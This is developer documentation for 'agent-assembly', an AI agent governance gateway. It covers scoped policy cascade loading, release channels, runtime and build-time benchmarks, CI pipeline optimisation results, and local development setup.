The headline scenarios — audit isolation, topology overview scoping, cross-org credential rejection (AAASM-2008), and cross-org budget envelope isolation (AAASM-2022) — ship complete.

Last updated: 2026-05-25 by Chisanan232

Multi-Document Policy Cascade

PolicyEngine::load_cascade_from_dir(dir) loads every *.yaml file in a directory and populates the gateway’s scope_index so each document cascades by its declared scope (Global / Org(<id>) / Team(<id>) / Agent(<id>)). This unlocks org-scoped, team-scoped, and agent-scoped policy rules in the runtime evaluation path — a capability that load_from_file (single-document) does not provide.

When to use

Multi-tenant deployments where each org needs its own deny/allow overrides on top of a Global baseline.
Team-level guardrails layered on top of the org’s rules (e.g. “platform team can use bash, but support cannot”).
Per-agent escape hatches for a single high-risk agent that needs a narrower allowlist than its team’s default.

Single-policy deployments should continue using load_from_file — the cascade adds zero value when there’s only one document.

Directory layout

policies/
├── 000-global-allow-all.yaml      # spec.scope: global (or omitted)
├── 100-org-acme-deny-bash.yaml    # spec.scope: org:acme
├── 200-team-platform.yaml         # spec.scope: team:platform
└── 300-agent-research-bot.yaml    # spec.scope: agent:<UUID>

Filename prefixes are convention only — the loader sorts alphabetically so the cascade order is deterministic across filesystems. Use numeric prefixes to make precedence visually obvious.

Scope field placement (gotcha)

When using the envelope format (apiVersion / kind / metadata / spec), the scope: field MUST live inside spec:, not at the outer envelope level:

# CORRECT — scope inside spec
apiVersion: agent-assembly.dev/v1alpha1
kind: GovernancePolicy
metadata:
  name: org-acme-deny-bash
spec:
  scope: org:acme
  tools:
    bash:
      allow: false

# WRONG — scope at envelope level is SILENTLY IGNORED
apiVersion: agent-assembly.dev/v1alpha1
kind: GovernancePolicy
metadata:
  name: org-acme-deny-bash
scope: org:acme         # ← will be ignored; document defaults to Global
spec:
  tools:
    bash:
      allow: false

The validator’s envelope parser deserializes spec’s value as a RawPolicyDocument — outer-level keys outside the envelope frame are silently dropped. Always put scope: inside spec:.
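
Since the mistake is silent, a pre-flight lint can catch it before the gateway loads the file. The sketch below works on an already-parsed document (a plain dict) and is purely illustrative: misplaced_scope_warnings and effective_scope are hypothetical helpers, not part of the validator, and the lowercase "global" default is a stand-in for the Global scope.

```python
from typing import List


def misplaced_scope_warnings(document: dict) -> List[str]:
    """Flag a 'scope' key at the envelope level, where it is ignored."""
    warnings = []
    if "scope" in document:
        warnings.append("top-level 'scope' is ignored; move it under 'spec'")
    return warnings


def effective_scope(document: dict) -> str:
    """Scope as the loader would see it: read from spec, else Global."""
    return document.get("spec", {}).get("scope", "global")
```

Running both helpers over the WRONG example above would report one warning and an effective scope of global, which is exactly the surprise the lint is meant to surface.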

How the cascade is collected

At evaluation time, the gateway walks scopes from broadest to narrowest for the calling agent’s lineage:

Global — every Global-scoped document.
Org — documents matching the agent’s lineage.org_id. The org is resolved from ctx.metadata["org_id"] (populated by the SDK’s proto AgentId.org_id).
Team — documents matching the agent’s lineage.team_id.
Agent — documents matching the agent’s lineage.agent_id.

Each level augments the cascade — Global rules still apply for agents in org-acme; the org-acme rules are added on top. The decision merger (merge_decisions) resolves conflicts with narrower scopes winning (Agent > Team > Org > Global).
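
The collect-then-merge flow can be modelled in a few lines. This is a deliberately reduced sketch: documents are plain dicts with a scope string and a tool-to-allow map, collect_cascade and merge_tool_decision are hypothetical names, and "the last matching document wins" is a simplification of whatever merge_decisions actually does beyond the stated precedence.

```python
from typing import Dict, List, Optional

SCOPE_ORDER = ("global", "org", "team", "agent")  # broadest to narrowest


def collect_cascade(documents: List[dict], lineage: Dict[str, str]) -> List[dict]:
    """Pick the documents that apply to this lineage, broadest scope first."""
    selected = []
    for kind in SCOPE_ORDER:
        for doc in documents:
            scope_kind, _, scope_id = doc["scope"].partition(":")
            if scope_kind != kind:
                continue
            if kind == "global" or lineage.get(f"{kind}_id") == scope_id:
                selected.append(doc)
    return selected


def merge_tool_decision(cascade: List[dict], tool: str) -> Optional[bool]:
    """Later (narrower) documents override earlier ones for the same tool."""
    decision = None
    for doc in cascade:
        if tool in doc["tools"]:
            decision = doc["tools"][tool]
    return decision
```

For an agent in org acme and team platform, a Global allow, an org-level deny, and a team-level allow for bash resolve to allow, because the team document is the narrowest one that mentions the tool.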

How `org_id` flows from request to cascade

The cascade’s filtering by lineage.org_id works through two paths:

From request context — convert.rs::request_to_core deposits proto.org_id into ctx.metadata["org_id"]. PolicyEngine::evaluate reads this first and uses it as the lineage hint. This is the primary path.
From registry fallback — when ctx.metadata["org_id"] is empty (e.g. for traffic that doesn’t go through the SDK’s identity plumbing), the engine falls back to registry.lineage(agent_id).

The primary path is what makes scope: org:<id> work end-to-end: every SDK call that populates AgentId.org_id lands in the right org’s cascade automatically.

Programmatic loading

For tests or programmatic setups that don’t use a directory:

use aa_gateway::PolicyEngine;
use tokio::sync::broadcast;

let (alert_tx, _) = broadcast::channel(64);
// `?` assumes the enclosing function returns a compatible Result.
let engine = PolicyEngine::load_cascade_from_dir(
    std::path::Path::new("/etc/aa-gateway/policies/"),
    alert_tx,
)?;

The loader returns the same PolicyEngine type as load_from_file, so it drops into existing service wiring without code changes.

Caveats

No filesystem watcher — the cascade is static at load. Hot-reload across multiple files is a separate concern; restart the gateway to pick up changes.
First Global doc supplies budget config — alphabetical order determines which Global document’s budget: block sets daily / monthly limits and data.sensitive_patterns. If two Global docs disagree on budget, the alphabetically-first one wins.
Parse failures abort the whole load — partial loads would be a worse failure mode than the loud abort; the caller gets a PolicyParseError for the first bad file.

Related

AAASM-2008 — Org-tier isolation (closes the audit / topology / credential surfaces; deferred the policy-scope half to this ticket).
aa-gateway/tests/cascade_merge_test.rs — pure-logic unit tests of the cascade evaluator (independent of the loader).
aa-integration-tests/tests/e2e_org_isolation.rs::st_org_4_* — the E2E test that exercises this loader against a real gateway.

Last updated: 2026-05-25 by Chisanan232

Releases

This page tells you where to find a published build, which channels it ships to, and how the release is cut.

agent-assembly is in the v0.0.1 pre-release series (alpha and beta tags). The public API and wire protocol are not yet stable.

Warning: every published tag is a pre-release. Do not run v0.0.1-alpha.* or v0.0.1-beta.* builds in production; the wire protocol can change between pre-releases.

Where releases live

GitHub Releases: https://github.com/ai-agent-assembly/agent-assembly/releases — the source of truth for published tags and changelogs. The latest tag is a pre-release (v0.0.1-beta.2, 2026-06-15).
Per-tag notes: the source-controlled release notes live under docs/release/ (one file per tag, e.g. docs/release/v0.0.1-beta.2.md).
Top-level changelog: CHANGELOG.md.

Distribution channels

A single coordinated tag push fans out to every channel:

Channel	Artifact
GitHub Releases	`aasm-*.tar.gz` binaries + `SHA256SUMS`
crates.io	Workspace crates at the tag version
Homebrew tap	`aasm` formula (`homebrew-agent-assembly`)
PyPI / npm	SDK packages
GHCR	Container image

Release process

The mechanics (version bump, tag, changelog, multi-channel publish) are driven by the automated release workflow. Operators follow the pre-tag checklist in the release runbook at docs/release/RUNBOOK.md. See also the Versioning Policy and Compatibility Matrix.

Last updated: 2026-06-15 by Chisanan232

Performance Benchmark Baseline

Baseline results recorded on 2026-04-29. Machine: Apple M-series (arm64), macOS Darwin 25.2.0.

All benchmarks run with cargo bench in release profile.

SDK Hook Overhead (`aa-ffi-python`)

Target: < 2 ms P99 per LLM call (AAASM-34 AC #6).

Benchmark	Mean	Low	High
`report_llm_call_channel`	237 ns	229 ns	245 ns

Verdict: PASS. The 237 ns mean is roughly 8,400 times (more than three orders of magnitude) below the 2 ms target.

Note (AAASM-2562): the aa-ffi-python SDK-hook benchmark (sdk_bench) moved to the python-sdk repo when the fat binding left this workspace — run it there with cargo bench --bench sdk_bench. The numbers above are retained as the historical 2026-04-29 baseline.

Proxy Intercept Latency (`aa-proxy`)

Target: < 5 ms P99 per intercepted request (AAASM-36 AC #5).

Benchmark	Mean	Low	High
`intercept/openai_response`	2.74 us	2.74 us	2.75 us
`intercept/openai_with_credential_redaction`	3.82 us	3.79 us	3.86 us

Verdict: PASS. Both variants are more than 1,000 times below the 5 ms target. Credential redaction adds ~1 us of overhead.

Gateway Policy Check (`aa-gateway`)

Benchmark	Mean	Low	High
`check_action_rpc/round_trip/minimal_llm_call`	79.6 us	78.8 us	80.5 us
`check_action_rpc/round_trip/full_tool_call_1kb`	79.6 us	78.3 us	80.9 us
`check_action_rpc/round_trip/worst_case_network`	76.3 us	75.6 us	76.9 us

Credential Scanner Throughput (`aa-core`)

Benchmark	Mean	Throughput
`scanner/scan_1mb_payload`	6.31 ms	~159 MB/s
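
The headroom behind the verdicts and the scanner throughput can be rechecked with simple arithmetic. The sketch below uses only the means from the tables on this page; note that the targets are stated as P99 while the tables report means, so the ratios are a rough indication and not a P99 measurement. The helper names are hypothetical.

```python
def headroom(target_seconds: float, measured_seconds: float) -> float:
    """How many times faster the measurement is than the target."""
    return target_seconds / measured_seconds


def throughput_mb_per_s(payload_mb: float, seconds: float) -> float:
    """Payload size divided by the time taken to scan it."""
    return payload_mb / seconds


sdk_hook = headroom(2e-3, 237e-9)          # 2 ms target vs 237 ns mean
proxy_redact = headroom(5e-3, 3.82e-6)     # 5 ms target vs 3.82 us mean
scanner = throughput_mb_per_s(1.0, 6.31e-3)  # 1 MB payload in 6.31 ms

print(f"SDK hook headroom:  {sdk_hook:,.0f}x")
print(f"Proxy headroom:     {proxy_redact:,.0f}x")
print(f"Scanner throughput: {scanner:.1f} MB/s")
```

The scanner figure comes out at about 158.5 MB/s from the rounded 6.31 ms mean, in line with the ~159 MB/s quoted in the table.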

Comparing Against Baseline

Run cargo bench to generate HTML reports in target/criterion/. Each benchmark group produces a report/index.html with historical comparison charts when prior runs exist.

To compare against this baseline:

Run cargo bench on the baseline commit to populate target/criterion/.
Run cargo bench on the new commit — Criterion auto-compares and reports percentage change with statistical significance.

Last updated: 2026-06-06 by Chisanan232

Build-Time Baseline

Before/after harness for Epic AAASM-2551 (Rust build & compile-time performance). This page records the build-time baseline established by Story AAASM-2557 so the profile (AAASM-2553), dev/linker (AAASM-2554), dependency-dedup (AAASM-2555), and CI (AAASM-2556) Stories can each quote a measured before/after against the same harness.

This is distinct from Baseline, which records runtime (cargo bench) numbers. This page measures how long the workspace takes to compile, not how fast it runs.

Harness

Run the full capture with:

make build-baseline          # wraps scripts/build-baseline.sh
# or
bash scripts/build-baseline.sh

The harness records four measurements and archives the raw outputs (logs, the cargo build --timings HTML, the top-crate extraction, and the cargo tree -d report) under target/build-baseline/ (gitignored):

#	Measurement	Command
1	Cold build	`cargo clean` then `cargo build --workspace --timings`
2	Warm rebuild	`touch aa-cli/src/main.rs` then `cargo build --workspace`
3	Test build	`cargo nextest run --workspace --no-run` (compile only)
4	Duplicate deps	`cargo tree -d`

Measurement 3 deliberately compiles the test binaries without running them: the build-time signal the profile/linker/dedup Stories move is the compile cost, whereas the full suite’s run wall-clock is dominated by Docker-backed integration tests and is sensitive to timing flakes. Set BUILD_BASELINE_RUN_TESTS=1 to additionally run the full suite (--no-fail-fast) and record its build+run wall-clock.

Why `aa-ebpf` is excluded

aa-ebpf requires a nightly toolchain plus bpf-linker, so the workspace’s own make build-workspace and make test targets build with --exclude aa-ebpf. The baseline mirrors that to measure the build path developers and the non-eBPF CI jobs actually hit. Pass BUILD_BASELINE_INCLUDE_EBPF=1 to include it on a nightly-capable host. Other tunables: BUILD_BASELINE_WARM_FILE, BUILD_BASELINE_TOP_N, BUILD_BASELINE_OUT (see the script header).

Reproducibility notes

Wall-clock is measured at whole-second resolution from the shell; expect a few percent run-to-run variance, especially for the link-bound warm rebuild.
Numbers are machine-specific. Always compare a before/after pair captured on the same machine — never an absolute number against a different host.
The third-party registry cache (~/.cargo) is shared, so the cold build measures compile + link time, not crate download time.

Recorded baseline

Captured 2026-06-05 on Apple M-series (arm64, 16 logical CPUs, 128 GB), macOS Darwin 25.4.0, cargo 1.95.0, cargo-nextest 0.9.133, default [profile.dev] and [profile.release] (i.e. the pre-Epic configuration).

Measurement	Wall-clock
Cold build (`cargo build --workspace --timings`)	124 s
Warm rebuild (touch `aa-cli/src/main.rs`, relink)	5 s
Test build (`cargo nextest run --workspace --no-run`)	396 s
Packages built in >1 version (`cargo tree -d`)	34
Distinct duplicate `(name, version)` build units	105

Local wall-clock is noisy: across three runs the cold build measured 91–211 s on this machine (background load / thermal). Treat these as the local order-of-magnitude; the Epic’s per-Story before/after pairs must be captured on the same idle machine, and CI numbers are authoritative.

Top longest-compiling crates

From the archived cargo build --timings HTML (target/build-baseline/cargo-timing.html), summing each crate’s units (build-script + lib + codegen):

Rank	Compile (s)	Crate
1	63.6	`aws-lc-sys` 0.40.0
2	35.2	`wasmtime` 45.0.0
3	33.7	`cranelift-codegen` 0.132.0
4	29.8	`rustls` 0.23.40
5	25.3	`object` 0.39.1
6	25.2	`libsqlite3-sys` 0.30.1
7	23.1	`asn1-rs` 0.7.1
8	22.9	`thiserror` 1.0.69
9	21.0	`rustix` 1.1.4
10	21.0	`wasmtime-internal-jit-debug` 45.0.0

The long poles are the WebAssembly stack (wasmtime, cranelift-codegen, wasmtime-internal-jit-debug — pulled by aa-wasm) and crypto/TLS (aws-lc-sys, rustls), confirming the Epic’s hypothesis. Per-crate seconds shift run-to-run with build parallelism, but this set is stable.
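The per-crate summing described above can be sketched as follows. This is a minimal illustration, not the harness's extraction code: the `Unit` struct and its field names are hypothetical, and it assumes the unit durations have already been pulled out of the timings report.

```rust
use std::collections::HashMap;

/// One compilation unit (build script, lib, codegen, ...) of a crate.
/// Hypothetical shape; the real report schema is not assumed here.
pub struct Unit<'a> {
    pub krate: &'a str,
    pub seconds: f64,
}

/// Sums unit durations per crate and returns the `n` slowest crates,
/// slowest first. Ties are broken by crate name so the order is stable.
pub fn top_crates(units: &[Unit<'_>], n: usize) -> Vec<(String, f64)> {
    let mut totals: HashMap<&str, f64> = HashMap::new();
    for unit in units {
        *totals.entry(unit.krate).or_insert(0.0) += unit.seconds;
    }
    let mut ranked: Vec<(String, f64)> = totals
        .into_iter()
        .map(|(name, secs)| (name.to_string(), secs))
        .collect();
    ranked.sort_by(|a, b| b.1.total_cmp(&a.1).then_with(|| a.0.cmp(&b.0)));
    ranked.truncate(n);
    ranked
}
```

Calling `top_crates(&units, 10)` on the extracted units would yield a ranking of the same shape as the table above; the per-crate seconds still depend on build parallelism, as noted.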

Duplicate dependencies (dedup baseline for AAASM-2555)

cargo tree -d reports 34 packages built in more than one version (105 distinct (name, version) units). The worst offenders:

Versions	Package
4	`hashbrown`
3	`rand`, `rand_core`, `getrandom`
2	`winnow`, `webpki-roots`, `wast`, `wasm-encoder`, `untrusted`, `toml`, `toml_datetime`, `thiserror-impl`, …

The complete set of multi-version packages — the committed dedup baseline for AAASM-2555 to diff against — follows. The full cargo tree -d report (with the inverted dependent trees) is also archived at target/build-baseline/cargo-tree-dups.txt for the dependency paths.

block-buffer        v0.10.4  v0.12.0
const-oid           v0.9.6   v0.10.2
convert_case        v0.10.0  v0.11.0
cpufeatures         v0.2.17  v0.3.0
crypto-common       v0.1.7   v0.2.1
deadpool            v0.12.3  v0.13.0
deadpool-runtime    v0.1.4   v0.3.1
digest              v0.10.7  v0.11.3
fixedbitset         v0.4.2   v0.5.7
foldhash            v0.1.5   v0.2.0
getrandom           v0.2.17  v0.3.4   v0.4.2
hashbrown           v0.14.5  v0.15.5  v0.16.1  v0.17.1
hashlink            v0.9.1   v0.10.0
hmac                v0.12.1  v0.13.0
itertools           v0.13.0  v0.14.0
lru                 v0.16.4  v0.18.0
petgraph            v0.6.5   v0.8.3
phf                 v0.11.3  v0.12.1
phf_shared          v0.11.3  v0.12.1
rand                v0.8.6   v0.9.4   v0.10.1
rand_chacha         v0.3.1   v0.9.0
rand_core           v0.6.4   v0.9.5   v0.10.1
reqwest             v0.12.28 v0.13.3
sha2                v0.10.9  v0.11.0
similar             v2.7.0   v3.1.1
thiserror           v1.0.69  v2.0.18
thiserror-impl      v1.0.69  v2.0.18
toml                v0.9.12  v1.1.2
toml_datetime       v0.7.5   v1.1.1
untrusted           v0.7.1   v0.9.0
wasm-encoder        v0.248.0 v0.251.0
wast                v35.0.2  v251.0.0
webpki-roots        v0.26.11 v1.0.7
winnow              v0.7.15  v1.0.2

AAASM-2555 should re-run cargo tree -d after centralizing [workspace.dependencies] and confirm this count drops.
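One way to make that before/after check mechanical is to parse two listings in the layout shown above and diff them. The sketch below is an assumption-laden illustration: `parse_dups` and `resolved` are hypothetical helpers, and the input is assumed to be the condensed `name v1 v2 ...` list, not the raw `cargo tree -d` output with its inverted trees.

```rust
use std::collections::BTreeMap;

/// Parses lines shaped like `hashbrown  v0.14.5  v0.15.5` into a map of
/// package name -> versions, keeping only packages with more than one version.
pub fn parse_dups(listing: &str) -> BTreeMap<String, Vec<String>> {
    let mut out = BTreeMap::new();
    for line in listing.lines() {
        let mut fields = line.split_whitespace();
        let Some(name) = fields.next() else { continue };
        let versions: Vec<String> = fields
            .filter(|f| f.starts_with('v'))
            .map(|f| f.to_string())
            .collect();
        if versions.len() > 1 {
            out.insert(name.to_string(), versions);
        }
    }
    out
}

/// Packages that were duplicated before the dedup pass and no longer are.
pub fn resolved(
    before: &BTreeMap<String, Vec<String>>,
    after: &BTreeMap<String, Vec<String>>,
) -> Vec<String> {
    before
        .keys()
        .filter(|k| !after.contains_key(*k))
        .cloned()
        .collect()
}
```

`parse_dups(before).len()` gives the multi-version package count for a listing, and `resolved` names the packages a dedup change actually collapsed.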

Full test build+run (context)

The default harness records test compile time only, because the full suite’s run wall-clock is dominated by integration-test execution rather than the build. For reference, one BUILD_BASELINE_RUN_TESTS=1 capture on the same machine measured 3452 s end-to-end build+run, of which the run phase took 2546 s (nextest summary: 3764 tests run: 3744 passed (228 slow, 4 leaky), 20 failed). The 20 failures are local timing-sensitive integration assertions (e.g. the aa-api L1-invalidation 100 ms check) and do not affect compile time. This number is here for completeness; the profile/linker/dedup Stories should be judged against the compile rows above, not this run-dominated figure.

Acceptance-criteria mapping (AAASM-2557)

Acceptance criterion	Evidence
Baseline numbers for cold build, warm rebuild, and test build+run recorded	“Recorded baseline” → wall-clock table (cold/warm/test-build) + “Full test build+run (context)”
`cargo build --timings` HTML identifies the top 5 longest-compiling crates	“Top longest-compiling crates” table (`target/build-baseline/cargo-timing.html`)
`cargo tree -d` attached as the dedup baseline for AAASM-2555	“Duplicate dependencies” table (`target/build-baseline/cargo-tree-dups.txt`)

Last updated: 2026-06-05 by Chisanan232

PolicyService CheckAction RPC — Latency Benchmark Results

Environment

Parameter	Value
CPU	Apple M3 Max
Memory	128 GB
OS	macOS 26.2 (Darwin)
Rust	1.95.0 (2026-04-14)
Tonic	0.13.1
Transport	TCP loopback (127.0.0.1)
Profile	`--release` (optimized)

SLA Target

p99 < 5 ms end-to-end round-trip (serialize + transport + evaluate + respond).

Criterion Micro-Benchmarks

Reused TCP connection, single client, 100 samples per variant.

Payload Variant	Description	Mean	Std Dev
`minimal_llm_call`	`LlmCallContext`, no PII	77.9 us	~1 us
`full_tool_call_1kb`	`ToolCallContext`, ~1KB `args_json`	82.2 us	~1 us
`worst_case_network`	`NetworkCallContext`, long URL (~400 bytes)	81.9 us	~1 us

Sustained Load Test (60 seconds)

1,000 req/sec sustained for 60 seconds, 10 concurrent clients, ToolCallContext payload.

Metric	Value	vs SLA
Total requests	60,000
Actual RPS	999
p50	144 us	34x headroom
p95	357 us	14x headroom
p99	803 us	6.2x headroom
p999	2.65 ms	1.9x headroom
max	10.89 ms

Verdict

PASS: p99 latency of 803 us is well under the 5 ms SLA target, with 6.2x headroom.

The max latency (10.89 ms) exceeds 5 ms, but this is expected for a single outlier in 60,000 requests on a non-isolated workstation. The p999 (2.65 ms) confirms the tail is well-bounded for all practical purposes.
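The percentile and headroom figures above can be reproduced from raw latency samples along these lines. This is a sketch under assumptions: it uses the nearest-rank percentile definition, which may differ from what the load-test tool uses, and both function names are hypothetical.

```rust
/// Nearest-rank percentile over latency samples in microseconds.
/// `p` must be in (0, 100]; returns `None` for empty input or invalid `p`.
pub fn percentile(samples_us: &[u64], p: f64) -> Option<u64> {
    if samples_us.is_empty() || !(p > 0.0 && p <= 100.0) {
        return None;
    }
    let mut sorted = samples_us.to_vec();
    sorted.sort_unstable();
    // Rank is 1-based: the smallest sample index covering p percent of the data.
    let rank = (p * sorted.len() as f64 / 100.0).ceil() as usize;
    Some(sorted[rank.clamp(1, sorted.len()) - 1])
}

/// Headroom factor: how many times the observed latency fits into the target.
pub fn headroom(target_us: f64, observed_us: f64) -> f64 {
    target_us / observed_us
}
```

With the 5 ms target expressed as 5000 us, `headroom(5000.0, 803.0)` is about 6.2 and `headroom(5000.0, 2650.0)` is about 1.9, matching the p99 and p999 rows.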

Last updated: 2026-05-04 by Chisanan232

CI/CD Pipeline Performance

Before/after record of the CI/CD workflow redesign delivered under Epic AAASM-2551 (Rust build & compile-time performance — local + CI). This page documents what changed and why, and quotes real GitHub Actions run data proving the speed-up.

This is distinct from Build-Time Baseline, which measures how long the workspace takes to compile. This page measures how long the CI pipeline takes end-to-end per change, and how much runner compute it consumes.

The problem (before)

ci.yml had ~30 jobs gated by a binary changes router (dorny/paths-filter emitting only rust / dashboard / ebpf). Any edit under aa-*/** set rust == true, which fanned out to ~22 Rust jobs regardless of which sub-area changed — including the expensive ones that are almost never relevant to a given change: the eBPF nightly build + sudo e2e, the proto breaking-check, the OpenAPI drift + Spectral lint, the schema lint, the TimescaleDB and migration-drift testcontainer jobs, full llvm-cov coverage, SonarCloud, and the criterion benchmark. There was also no aggregate gate job, and the aa-integration-tests suite ran twice on Linux.

The result: a one-line dependency bump paid for nearly the entire matrix.

What changed

Story	Change
AAASM-2598	Per-workflow `concurrency` groups; `cancel-in-progress` gated to `pull_request` (superseded PR runs are cancelled; pushes/releases never are).
AAASM-2599	Fine-grained `changes` router — added `proto` / `schema` / `openapi` / `storage` outputs (each a strict subset of `rust`) and re-gated the single-purpose validators onto them. Added a single `CI Success` aggregate gate (`needs` every functional job, `if: always()`, fails on any `failure`/`cancelled`; `coverage`/`sonar` excluded as advisory).
AAASM-2600	Docker / FFI images build PR-light (one arch, `is_latest` only) on PRs; full multi-arch + push only on `v*` tags.
AAASM-2601	Relocated `Coverage` / `SonarCloud` / `Benchmark` behind `push`-or-label gates — they no longer run on every PR.
AAASM-2611	Least-privilege `permissions: contents: read` at the top of every workflow; write elevated per-job only where needed.
AAASM-2628	Closed a trigger-path gap — `schemas/` (and `openapi/`) were missing from `ci.yml`’s `on.*.paths`, so schema-only changes never ran `schema-lint`.
AAASM-2631	Dropped the redundant Linux `aa-integration-tests` run — it already runs in `ci.yml`’s `test` job; the dedicated workflow is now macOS-only.

The mechanism: a typical change now runs the always-on fast gate (build, fmt, clippy, rustdoc, test, deny, no-std, conformance) plus only the area(s) it actually touched. Everything else skips, and a single CI Success status summarises the run.
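The aggregate gate rule from AAASM-2599 (fail on any `failure` or `cancelled`, treat skipped jobs as fine, ignore the advisory `coverage` and `sonar` jobs) can be modelled in a few lines. The real gate is a GitHub Actions job; this Rust sketch only illustrates the decision logic, and the `JobResult` enum, the `ADVISORY` list, and the job-name strings are hypothetical.

```rust
#[derive(Clone, Copy, PartialEq, Eq, Debug)]
pub enum JobResult {
    Success,
    Failure,
    Cancelled,
    Skipped,
}

/// Jobs treated as advisory: their result never fails the gate.
const ADVISORY: [&str; 2] = ["coverage", "sonar"];

/// Returns true when the gate should report success: no functional job
/// failed or was cancelled. Skipped jobs (areas the change did not touch)
/// do not block the gate.
pub fn ci_success(results: &[(&str, JobResult)]) -> bool {
    results
        .iter()
        .filter(|(name, _)| !ADVISORY.contains(name))
        .all(|(_, r)| !matches!(r, JobResult::Failure | JobResult::Cancelled))
}
```

Treating `Skipped` as passing is what lets area routing and a single required status coexist: a change that touches no proto code skips the proto validators without turning the gate red.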

Measured results (real GitHub Actions runs)

Apples-to-apples: the identical dependency-bump PR, before and after

The same dependabot/cargo/master/async-nats-0.49.1 PR was re-run before and after the redesign — same diff, same content:

Metric	Before — run #2179 (2026-06-04)	After — run #2283 (2026-06-06)	Δ
Jobs executed	23 of 30	16 of 32	−7 jobs
Runner-minutes (Σ job durations)	64.0	17.3	−73 %
Wall-clock	71.1 min	10.0 min	−86 % (7.1× faster)

Because async-nats is a transitive cargo bump that touches no proto / schema / OpenAPI / storage / eBPF / dashboard code, the after-run correctly skips Benchmark, Coverage, SonarCloud, Migration drift check, TimescaleDB Tests, Proto lint & breaking check (buf), Schema lint, OpenAPI drift, OpenAPI lint, and both eBPF jobs — none of which it can affect.
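The Δ column in the table above follows from two small formulas, shown here as a worked sketch. The function names are hypothetical; the inputs in the usage note are the table's own figures.

```rust
/// Percentage reduction from `before` to `after` (positive means less work).
pub fn reduction_pct(before: f64, after: f64) -> f64 {
    (before - after) / before * 100.0
}

/// Speed-up factor: how many times faster `after` is than `before`.
pub fn speedup(before: f64, after: f64) -> f64 {
    before / after
}
```

`reduction_pct(64.0, 17.3)` is about 73 (runner-minutes), `reduction_pct(71.1, 10.0)` is about 86, and `speedup(71.1, 10.0)` is about 7.1 (wall-clock).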

Dashboard-only PR

A dashboard dependency bump now runs only the dashboard jobs:

	Before — run #2180	After — run #2288
Jobs executed	full dashboard + rust fan-out	7 of 31 (24 skipped — every Rust job)
Wall-clock	55.2 min	10.4 min

Master push (full coverage, incl. `Coverage` + `SonarCloud`)

Pushes still run the acceptance jobs (Coverage/Sonar are push-gated), yet still benefit from area-routing, concurrency cancellation, and the shared dashboard-assets artifact:

	Before — run #2200	After — run #2292
Runner-minutes	80.8	44.1
Wall-clock	132 min	29 min

Methodology & caveats

Data was pulled from the GitHub Actions REST API (/repos/.../actions/runs/<id>/jobs). Runner-minutes = the sum of each non-skipped job’s completed_at − started_at. Wall-clock = the run’s updated_at − run_started_at.
Runner-minutes and job-count are deterministic measures of work performed. Wall-clock carries cache-warmth and runner-availability noise (a cold Swatinem/rust-cache or a busy runner pool inflates it), so treat the wall-clock figures as illustrative and the runner-minute / job-count figures as the load-bearing evidence.
Run numbers are cited so each row can be re-inspected: gh api repos/ai-agent-assembly/agent-assembly/actions/runs/<id>/jobs.
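The two definitions above translate directly into code. The sketch below assumes the API's ISO 8601 timestamps have already been converted to epoch seconds, and that skipped jobs are identified by a `conclusion` of `"skipped"`; the `Job` struct is a hypothetical, trimmed-down stand-in for the API's job object.

```rust
/// Minimal view of one job from the run's jobs listing.
pub struct Job {
    /// Job outcome, e.g. "success", "failure", or "skipped" (assumed values).
    pub conclusion: &'static str,
    /// Start time in epoch seconds (already parsed from the API timestamp).
    pub started_at: u64,
    /// Completion time in epoch seconds.
    pub completed_at: u64,
}

/// Runner-minutes: sum of (completed_at - started_at) over non-skipped jobs.
pub fn runner_minutes(jobs: &[Job]) -> f64 {
    let secs: u64 = jobs
        .iter()
        .filter(|j| j.conclusion != "skipped")
        .map(|j| j.completed_at.saturating_sub(j.started_at))
        .sum();
    secs as f64 / 60.0
}

/// Wall-clock minutes: the run's updated_at minus run_started_at.
pub fn wall_clock_minutes(run_started_at: u64, updated_at: u64) -> f64 {
    updated_at.saturating_sub(run_started_at) as f64 / 60.0
}
```

Because jobs run in parallel and may also queue, the two numbers are independent: runner-minutes can be larger or smaller than wall-clock for the same run.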

Takeaway

For the common case (a focused change or a dependency bump) the pipeline does ~73 % less work, measured in runner-minutes, and returns a result ~7× sooner, while a single CI Success gate still guarantees nothing necessary was skipped: every functional job is a dependency of the gate, and each area’s validators run whenever their own inputs change.

Last updated: 2026-06-07 by Chisanan232

Local Development

This page covers the from-clone development loop for the agent-assembly monorepo. For contribution conventions (commit style, PR process) see CONTRIBUTING.md.

Prerequisites

Rust stable (≥ 1.75) via rustup
protoc — Protocol Buffers compiler (brew install protobuf / apt-get install protobuf-compiler); required by the aa-proto and aa-gateway build scripts
cargo-nextest, cargo-deny, and Lefthook
Linux, needed only for the proxy / eBPF layers (see Supported platforms).

Bootstrap

git clone https://github.com/ai-agent-assembly/agent-assembly.git
cd agent-assembly

# Installs toolchains, clones the SDK polyrepos as siblings, installs git
# hooks, and builds the workspace.
make dev-setup

# Smoke-tests each SDK repo in parallel, then checks gateway health.
make dev-verify

Everyday loop

cargo build --workspace --exclude aa-ebpf   # build (skip the BPF-target crate off Linux)
cargo nextest run --workspace               # full test suite
cargo nextest run -p aa-core                # one crate
cargo fmt --all                             # format
cargo clippy --all-targets -- -D warnings   # lint
cargo deny check                            # dependency / license audit

The eBPF crates compile with a target-specific toolchain; on non-Linux hosts cargo check -p aa-ebpf is sufficient.

Git hooks

Hooks are managed by Lefthook (lefthook.toml). Install them once with lefthook install. The pre-commit hook runs fmt, clippy, and deny scoped by file glob; the pre-push hook runs cargo doc --workspace --no-deps.

Running locally

Point the gateway at a bundled reference policy and connect a sidecar:

cargo run -p aa-gateway -- --policy policy-examples/low-risk.yaml

See the CLI page for aasm operator commands and the README “Running with Docker Compose” section for the sidecar stack.

Troubleshooting

Symptom	Cause	Fix
`protoc` / “Could not find protoc” build error	Protocol Buffers compiler missing	Install it (`brew install protobuf` or `apt-get install protobuf-compiler`) — `aa-proto` and `aa-gateway` need it
`cargo build` fails on `aa-ebpf*` off Linux	eBPF crates target the BPF toolchain	Build with `--exclude aa-ebpf`; use `cargo check -p aa-ebpf` on non-Linux hosts
Pre-commit hook does not run	Lefthook hooks not installed	Run `lefthook install` once in the repo
Pre-push fails on `cargo doc`	A doc comment has a broken intra-doc link	Run `cargo doc --workspace --no-deps` locally and fix the reported link
`make dev-verify` skips the Go smoke test	`go-sdk` checkout is missing or has no `internal/smoke/`	Expected when the Go SDK sibling repo is absent; clone it next to `agent-assembly` to enable it

Last updated: 2026-06-11 by Chisanan232

Consuming the Shared Crates

The thin per-language SDK shims live in their own repositories (python-sdk, node-sdk) but reuse Rust crates that are developed in this monorepo. Four crates are consumed from outside the workspace:

Crate	Role in the SDK shim
`aa-core`	wire types and traits
`aa-proto`	generated protobuf / gRPC wire types
